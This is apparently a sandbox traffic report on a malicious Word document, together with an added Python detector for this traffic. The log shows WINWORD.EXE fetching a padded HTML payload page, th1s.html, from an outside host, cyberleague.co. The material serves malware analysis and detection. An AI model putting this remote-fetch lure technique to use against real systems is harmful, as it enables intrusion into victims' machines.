Jun 3, 2022 23:03:17.544548035 CEST  443          49746      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:17.544698954 CEST  443          49746      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:17.544766903 CEST  49746        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:17.544823885 CEST  443          49746      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:17.544878960 CEST  49746        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:17.544899940 CEST  443          49746      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:17.729070902 CEST  49747        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:17.729166031 CEST  443          49747      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:17.729268074 CEST  49747        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:17.729895115 CEST  49747        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:17.729923964 CEST  443          49747      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:18.112638950 CEST  443          49747      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:18.112771988 CEST  49747        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:18.122047901 CEST  49747        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:18.122102022 CEST  443          49747      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:18.122711897 CEST  443          49747      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:18.122807026 CEST  49747        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:18.123374939 CEST  49747        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:18.164509058 CEST  443          49747      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:18.487524033 CEST  443          49747      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:18.487576008 CEST  443          49747      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:18.487673044 CEST  443          49747      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:18.487715006 CEST  49747        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:18.487747908 CEST  49747        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:18.487756968 CEST  49747        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:18.488909006 CEST  49747        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:18.488945007 CEST  443          49747      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:18.696450949 CEST  49748        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:18.696521044 CEST  443          49748      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:18.696635008 CEST  49748        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:18.696944952 CEST  49748        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:18.696978092 CEST  443          49748      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:19.077434063 CEST  443          49748      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:19.077559948 CEST  49748        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:19.077939987 CEST  49748        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:19.077960014 CEST  443          49748      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:19.082124949 CEST  49748        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:19.082139015 CEST  443          49748      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:19.454433918 CEST  443          49748      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:19.454556942 CEST  443          49748      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:19.454586983 CEST  49748        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:19.454638958 CEST  49748        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:19.454749107 CEST  49748        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:19.454785109 CEST  443          49748      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:19.454799891 CEST  49748        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:19.454858065 CEST  49748        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:19.638972998 CEST  49749        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:19.639030933 CEST  443          49749      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:19.639137030 CEST  49749        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:19.639359951 CEST  49749        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:19.639388084 CEST  443          49749      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:20.015038967 CEST  443          49749      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:20.015166998 CEST  49749        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:20.015516996 CEST  49749        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:20.015528917 CEST  443          49749      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:20.019237041 CEST  49749        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:20.019248009 CEST  443          49749      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:20.387357950 CEST  443          49749      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:20.387470961 CEST  443          49749      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:20.387542009 CEST  49749        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:20.387569904 CEST  49749        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:20.387645006 CEST  49749        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:20.387676001 CEST  443          49749      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:20.387691975 CEST  49749        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:20.387777090 CEST  49749        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:20.431368113 CEST  49750        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:20.431452990 CEST  443          49750      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:20.431574106 CEST  49750        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:20.431767941 CEST  49750        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:20.431787014 CEST  443          49750      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:20.812314987 CEST  443          49750      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:20.813051939 CEST  49750        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:20.813095093 CEST  443          49750      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:20.815042019 CEST  49750        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:20.815063000 CEST  443          49750      13.250.15.191  192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:21.188411951 CEST4434975013.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:21.188580036 CEST4434975013.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:21.188710928 CEST49750443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:21.309567928 CEST49750443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:21.309632063 CEST4434975013.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:21.309654951 CEST49750443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:21.309670925 CEST4434975013.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:21.334511995 CEST49751443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:21.334573030 CEST4434975113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:21.334682941 CEST49751443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:21.374809980 CEST49751443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:21.374881983 CEST4434975113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:21.755670071 CEST4434975113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:21.756138086 CEST49751443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:21.756165028 CEST4434975113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:21.811460018 CEST49751443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:21.811491013 CEST4434975113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:22.136460066 CEST4434975113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:22.136626005 CEST4434975113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:22.136754990 CEST49751443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:22.421732903 CEST49751443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:22.421775103 CEST4434975113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:22.421825886 CEST49751443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:22.421842098 CEST4434975113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:22.429121971 CEST49752443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:22.429176092 CEST4434975213.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:22.429279089 CEST49752443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:22.429510117 CEST49752443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:22.429531097 CEST4434975213.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:22.849932909 CEST4434975213.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:22.850053072 CEST49752443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:22.853833914 CEST49752443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:22.853871107 CEST4434975213.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:22.856193066 CEST49752443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:22.856214046 CEST4434975213.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:23.266453981 CEST4434975213.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:23.266604900 CEST4434975213.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:23.266632080 CEST49752443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:23.266696930 CEST49752443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:23.810359955 CEST49752443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:23.810405970 CEST4434975213.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:23.810518980 CEST49752443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:23.810550928 CEST49752443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:24.043535948 CEST49753443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:24.043626070 CEST4434975313.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:24.043754101 CEST49753443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:24.044137955 CEST49753443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:24.044167995 CEST4434975313.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:24.451858044 CEST4434975313.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:24.452018023 CEST49753443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:24.452374935 CEST49753443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:24.452390909 CEST4434975313.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:24.454803944 CEST49753443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:24.454819918 CEST4434975313.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:24.855674982 CEST4434975313.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:24.855797052 CEST4434975313.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:24.855946064 CEST49753443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:24.855989933 CEST49753443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:24.856014967 CEST49753443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:24.856050968 CEST4434975313.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:24.856117964 CEST49753443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:24.856129885 CEST49753443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:25.031929016 CEST49754443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:25.032002926 CEST4434975413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:25.032176971 CEST49754443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:25.032753944 CEST49754443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:25.032780886 CEST4434975413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:25.412844896 CEST4434975413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:25.413141012 CEST49754443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:25.418405056 CEST49754443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:25.418438911 CEST4434975413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:25.421214104 CEST49754443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:25.421247005 CEST4434975413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:25.790615082 CEST4434975413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:25.790733099 CEST4434975413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:25.790827990 CEST49754443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:25.790849924 CEST49754443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:25.790931940 CEST49754443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:25.790952921 CEST4434975413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:25.790970087 CEST49754443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:25.791033983 CEST49754443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:28.504662991 CEST49755443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:28.504743099 CEST4434975513.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:28.504865885 CEST49755443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:28.505152941 CEST49755443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:28.505171061 CEST4434975513.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:28.924880028 CEST4434975513.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:28.924987078 CEST49755443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:28.926331997 CEST49755443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:28.926354885 CEST4434975513.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:28.928816080 CEST49755443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:28.928831100 CEST4434975513.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:29.342540026 CEST4434975513.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:29.342609882 CEST4434975513.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:29.342649937 CEST49755443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:29.342701912 CEST49755443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:29.342797995 CEST49755443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:29.342838049 CEST4434975513.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:29.342859983 CEST49755443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:29.342921972 CEST49755443192.168.2.313.250.15.191
Timestamp                           Source Port  Dest Port  Source IP    Dest IP
Jun 3, 2022 23:03:11.982377052 CEST  58116        53         192.168.2.3  8.8.8.8
Jun 3, 2022 23:03:12.041520119 CEST  53           58116      8.8.8.8      192.168.2.3
Jun 3, 2022 23:03:17.620388031 CEST  65358        53         192.168.2.3  8.8.8.8
Jun 3, 2022 23:03:17.727202892 CEST  53           65358      8.8.8.8      192.168.2.3
Timestamp                           Source IP    Dest IP  Trans ID  OP Code             Name            Type            Class
Jun 3, 2022 23:03:11.982377052 CEST  192.168.2.3  8.8.8.8  0x8c64    Standard query (0)  cyberleague.co  A (IP address)  IN (0x0001)
Jun 3, 2022 23:03:17.620388031 CEST  192.168.2.3  8.8.8.8  0x2d69    Standard query (0)  cyberleague.co  A (IP address)  IN (0x0001)
Timestamp                           Source IP  Dest IP      Trans ID  Reply Code    Name            CName  Address        Type            Class
Jun 3, 2022 23:03:12.041520119 CEST  8.8.8.8    192.168.2.3  0x8c64    No error (0)  cyberleague.co  -      13.250.15.191  A (IP address)  IN (0x0001)
Jun 3, 2022 23:03:17.727202892 CEST  8.8.8.8    192.168.2.3  0x2d69    No error (0)  cyberleague.co  -      13.250.15.191  A (IP address)  IN (0x0001)
                                                                                                                                                              • cyberleague.co
Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.3  49741        13.250.15.191   443               C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp                kBytes transferred  Direction  Data
2022-06-03 21:03:12 UTC  0                   OUT        OPTIONS / HTTP/1.1
    Connection: Keep-Alive
    Authorization: Bearer
    User-Agent: Microsoft Office Word 2014
    X-Office-Major-Version: 16
    X-MS-CookieUri-Requested: t
    X-FeatureVersion: 1
    X-MSGETWEBURL: t
    X-IDCRL_ACCEPTED: t
    Host: cyberleague.co
2022-06-03 21:03:12 UTC  0                   IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 03 Jun 2022 21:03:12 GMT
    Content-Type: text/html
    Content-Length: 0
    Connection: close
    Allow: GET,POST,OPTIONS,HEAD,TRACE
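
The OPTIONS / and HEAD /th1s.html requests that WINWORD.EXE sends to cyberleague.co above carry the header set Office uses when it resolves a URL referenced from inside a document (Office user agent, X-Office-Major-Version, X-IDCRL_ACCEPTED, X-MS-CookieUri-Requested, and an Authorization: Bearer header with no token). The following Python detector is an added example, not part of the Joe Sandbox report: it parses raw HTTP requests from a proxy or TLS-inspection log and reports Office-client requests to hosts outside an assumed trusted-suffix list, keeping the method sequence and target paths per host so the OPTIONS/HEAD probe pattern is visible. The first two sample requests are re-typed from the session above; the third is a constructed benign control. TRUSTED_SUFFIXES, the marker-header threshold and the control request are assumptions.

```python
"""Detector for Office external-reference fetches in raw HTTP request logs.

Added example, not part of the Joe Sandbox report. The first two sample
requests are re-typed from the WINWORD.EXE sessions above; the third is a
constructed benign control. TRUSTED_SUFFIXES and the marker threshold are
assumptions a deployment would tune.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

OFFICE_UA = re.compile(r"^Microsoft Office (Word|Excel|PowerPoint)\b", re.I)
# Request headers Office adds when it resolves a URL embedded in a document;
# all three appear on the requests captured above.
OFFICE_MARKERS = ("x-office-major-version", "x-idcrl_accepted",
                  "x-ms-cookieuri-requested")
# Assumption: Office traffic to these domains is expected and not reported.
TRUSTED_SUFFIXES = ("microsoft.com", "office.com", "office365.com",
                    "live.com", "sharepoint.com")

# Headers shared by the two captured requests (the OPTIONS probe also sent
# X-MSGETWEBURL: t, added below). Note the empty Bearer token.
COMMON_HEADERS = (
    "Connection: Keep-Alive\r\n"
    "Authorization: Bearer\r\n"
    "User-Agent: Microsoft Office Word 2014\r\n"
    "X-Office-Major-Version: 16\r\n"
    "X-MS-CookieUri-Requested: t\r\n"
    "X-FeatureVersion: 1\r\n"
    "X-IDCRL_ACCEPTED: t\r\n"
    "Host: cyberleague.co\r\n\r\n"
)
SAMPLE_REQUESTS: List[Tuple[str, str]] = [
    ("2022-06-03 21:03:12 UTC",
     "OPTIONS / HTTP/1.1\r\nX-MSGETWEBURL: t\r\n" + COMMON_HEADERS),
    ("2022-06-03 21:03:13 UTC",
     "HEAD /th1s.html HTTP/1.1\r\n" + COMMON_HEADERS),
    ("2022-06-03 21:03:14 UTC",   # constructed control: same UA, trusted host
     "GET / HTTP/1.1\r\nUser-Agent: Microsoft Office Word 2014\r\n"
     "Host: officeclient.microsoft.com\r\n\r\n"),
]


@dataclass
class Request:
    ts: str
    method: str
    target: str
    headers: Dict[str, str]   # header names lower-cased


def parse_request(ts: str, raw: str) -> Request:
    """Parse the request line and headers of one raw HTTP/1.1 request."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(ts, method, target, headers)


def is_trusted_host(host: str) -> bool:
    host = host.lower().split(":")[0]
    return any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES)


def is_office_client(req: Request) -> bool:
    """Office UA plus at least two of the document-link marker headers."""
    ua_ok = OFFICE_UA.match(req.headers.get("user-agent", "")) is not None
    markers = sum(1 for m in OFFICE_MARKERS if m in req.headers)
    return ua_ok and markers >= 2


def find_external_reference_fetches(records):
    """Group Office requests to untrusted hosts; returns {host: details}."""
    hits: Dict[str, Dict] = {}
    for ts, raw in records:
        req = parse_request(ts, raw)
        host = req.headers.get("host", "")
        if not host or is_trusted_host(host) or not is_office_client(req):
            continue
        entry = hits.setdefault(host, {"first_seen": ts, "methods": [],
                                       "targets": [], "empty_bearer": False})
        entry["methods"].append(req.method)
        entry["targets"].append(req.target)
        # "Authorization: Bearer" with no token: the client is fishing for an
        # authentication challenge before fetching the referenced file.
        if req.headers.get("authorization", "").lower() == "bearer":
            entry["empty_bearer"] = True
    return hits


if __name__ == "__main__":
    for host, info in find_external_reference_fetches(SAMPLE_REQUESTS).items():
        print(f"{info['first_seen']} {host}: {' -> '.join(info['methods'])} "
              f"targets={info['targets']} empty_bearer={info['empty_bearer']}")
```

Run against the two captured requests the detector reports cyberleague.co with the sequence OPTIONS -> HEAD and targets / and /th1s.html, while the control request to a trusted host is ignored. In an investigation the host entry is joined with the DNS answer above (cyberleague.co -> 13.250.15.191) and the session's process column (WINWORD.EXE) to attribute the fetch to the opened document rather than to a browser.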


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49744 | 13.250.15.191 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-06-03 21:03:13 UTC | 0 | OUT | HEAD /th1s.html HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-IDCRL_ACCEPTED: t
Host: cyberleague.co
2022-06-03 21:03:13 UTC | 0 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Jun 2022 21:03:13 GMT
Content-Type: text/html
Content-Length: 5092
Connection: close
Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
ETag: "13e4-5e063d0e1ca1e"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.3 | 49754 | 13.250.15.191 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-06-03 21:03:25 UTC | 9 | OUT | HEAD /th1s.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: cyberleague.co
Connection: Keep-Alive
2022-06-03 21:03:25 UTC | 9 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Jun 2022 21:03:25 GMT
Content-Type: text/html
Content-Length: 5092
Connection: close
Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
ETag: "13e4-5e063d0e1ca1e"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.3 | 49755 | 13.250.15.191 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-06-03 21:03:28 UTC | 10 | OUT | HEAD /th1s.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: cyberleague.co
Connection: Keep-Alive
2022-06-03 21:03:29 UTC | 10 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Jun 2022 21:03:29 GMT
Content-Type: text/html
Content-Length: 5092
Connection: close
Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
ETag: "13e4-5e063d0e1ca1e"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49746 | 13.250.15.191 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-06-03 21:03:17 UTC | 0 | OUT | OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: cyberleague.co
2022-06-03 21:03:17 UTC | 1 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Jun 2022 21:03:17 GMT
Content-Type: text/html
Content-Length: 0
Connection: close
Allow: GET,POST,OPTIONS,HEAD,TRACE


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49747 | 13.250.15.191 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-06-03 21:03:18 UTC | 1 | OUT | GET /th1s.html HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
Accept-Encoding: gzip, deflate
Host: cyberleague.co
Connection: Keep-Alive
2022-06-03 21:03:18 UTC | 1 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Jun 2022 21:03:18 GMT
Content-Type: text/html
Content-Length: 5092
Connection: close
Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
ETag: "13e4-5e063d0e1ca1e"
Accept-Ranges: bytes
2022-06-03 21:03:18 UTC | 1 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 20 20 20 20 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
Data Ascii: <!DOCTYPE html><html><body> <script> //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49748 | 13.250.15.191 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-06-03 21:03:19 UTC | 6 | OUT | HEAD /th1s.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: cyberleague.co
Connection: Keep-Alive
